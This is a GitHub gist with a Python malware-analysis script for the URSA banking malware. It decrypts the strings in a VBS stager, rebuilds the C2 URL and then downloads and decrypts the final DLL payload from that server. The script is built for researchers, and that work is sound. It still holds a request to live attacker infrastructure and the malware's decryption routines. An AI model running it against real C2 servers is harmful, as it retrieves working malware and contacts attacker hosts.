Created
November 12, 2023 14:19
-
-
Save 0xToxin/b610d15bcf42b410f9075880b601ba22 to your computer and use it in GitHub Desktop.
The script fetches and decrypts the final URSA DLL based on the vbs stager script accessed post geofence check. The script will print the download URL of the archive which contains the encrypted URSA DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import zipfile | |
from io import BytesIO | |
''' | |
Assumptions: | |
1. The first const appreance will be the number used for strings decryption. | |
2. The first few lines after the const will have the decryption function in it. | |
3. The retrieved payload from the C2 is zip archive. | |
''' | |
FILE_PATH ='' | |
def resolve(obf_string, i): #Strings decryption routine. | |
try: | |
a = ord(obf_string[0]) - 65 | |
rest = obf_string[1:] | |
final = '' | |
for x in range(0,len(rest),2): | |
b = ord(rest[x]) - 65 | |
c = ord(rest[x + 1]) - 65 | |
final += chr(b * 25 + c - a - i) | |
except: | |
return '' | |
return final | |
def decrypt_dll(file_handle, file_name): | |
first = file_handle[0] | |
counter = 0 | |
final = [] | |
for x in range(1,len(file_handle)): | |
temp_val = file_handle[x] - first - counter & 0xFF | |
if counter < 9: | |
counter += 1 | |
else: | |
counter = 0 | |
final.append(temp_val) | |
with open(f'{file_name}.dll', 'wb') as f: | |
f.write(bytearray(final)) | |
f.close | |
lines_data = open(FILE_PATH,'r').readlines() | |
decrypted_strings = [] | |
for line_itr in range(0, len(lines_data)): | |
if lines_data[line_itr].startswith('const'): | |
seeder = int(lines_data[line_itr].split(' ')[-1]) #The seeder used for the decrpyption. | |
function_string = lines_data[line_itr + 1].split('(')[0].split(' ')[-1] #get function name. | |
for inner_itr in range(line_itr + 1, len(lines_data)): | |
if function_string in lines_data[inner_itr]: | |
decrypted_strings.append(resolve(lines_data[inner_itr].split('"')[-2], seeder)) #extract the inner string. | |
if lines_data[inner_itr].startswith('const'): | |
break | |
break | |
payload_url = f'{decrypted_strings[1]}m1{decrypted_strings[5]}' | |
print(f'[+] Fetching payload from C2:{payload_url}') | |
response = requests.get(payload_url) # The retrieved data is a zip file. | |
if response.status_code == 200: | |
zip_file = zipfile.ZipFile(BytesIO(response.content)) | |
file_name = zip_file.namelist()[0] | |
file_handle = zip_file.open(file_name,'r').read() | |
decrypt_dll(file_handle,file_name) | |
print(f'[+] The file {file_name}.dll was created') | |
else: | |
print(f'[-] Error code {response.status_code} while trying to download from:{payload_url}') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment